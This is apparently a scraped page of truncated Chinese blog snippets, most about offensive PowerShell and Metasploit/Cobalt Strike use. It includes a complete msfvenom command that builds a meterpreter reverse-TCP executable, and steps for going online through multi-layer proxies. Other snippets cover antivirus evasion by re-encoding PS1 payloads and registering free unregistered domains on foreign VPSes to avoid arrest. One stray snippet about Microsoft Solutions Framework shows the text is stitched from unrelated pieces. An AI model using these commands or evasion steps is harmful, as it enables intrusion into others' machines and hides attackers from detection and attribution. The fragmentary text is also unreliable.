powershell是一個很好的寶藏庫，在內網中可能會給出意外驚喜。 挑一點重點說說,本文的殺軟以火絨為主。 其實我們都用過powershell， 比如ls，dir ...

被控端生成：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.139 LPORT=2345 -f exe > /root/yangtest.exe msf配置如下當被控端運行后即可上線：msf5 > use ...

正文 域名和CDN配置 需要的東西：一台國外的VPS 這里我推薦vultr （騰訊雲和阿里雲等國內的VPS是不支持免備案的） 說到域名上線，自然就不能老老實實的去用自己備案了的域名，不然又是一個當場逮捕。 到這里https://freenom.com/ 注冊一個免費且不用備案的的tk域名 ...

在做一個小項目的過程中用到了 powershell 反彈 shell 到 msf，在本地和靶機分別做了幾次實驗，記錄下來 payload 一、msfvenom生成ps1木馬 msf 生成 ps1，傳到目標再遠程執行，但是 ps1 不能在 cmd 下執行，查資料了解到 cmd 執行如下命令 ...

cs 多層代理+msf（frp代理）聯合 1.cs多層代理 目標機器： 當目標多層內網的時候，如何把每一層機器都上線到cs端呢， 如果是msf直接可以一層一層寫路由即可，cs需要借助上一層上線。 這里直接第一層使用powershell上線 可以看到，目標存在另一個內網 ...

什么是MSF MSF，即Microsoft Solution Framework，也就是微軟推薦的做軟件的方法。 MSF發展：大約在1994年，微軟在總結了自己產品團隊的開發經驗和教訓，以及微軟咨詢服務部門的業務經驗后，推出了Microsoft 解決方案框架Microsoft Solution ...

方法1：ps1免殺 共五步 總述：主要就是[Byte[]]$var_code換一種編碼，然后改掉關鍵詞，比如函數名，變量名。 1.CS生成ps1 主要改：[Byte[]]$var ...

前言 演練項目，抓到一個Cs的hta形式的powershell木馬，通過hta釣魚上線，Payload是Powershell 解密 其實根據態勢感知流量分析已經獲得了公網IP，出於興趣解密一下 腳本如下: base64后 發現將base64解碼存入流中，然后有Gzip解壓縮 ...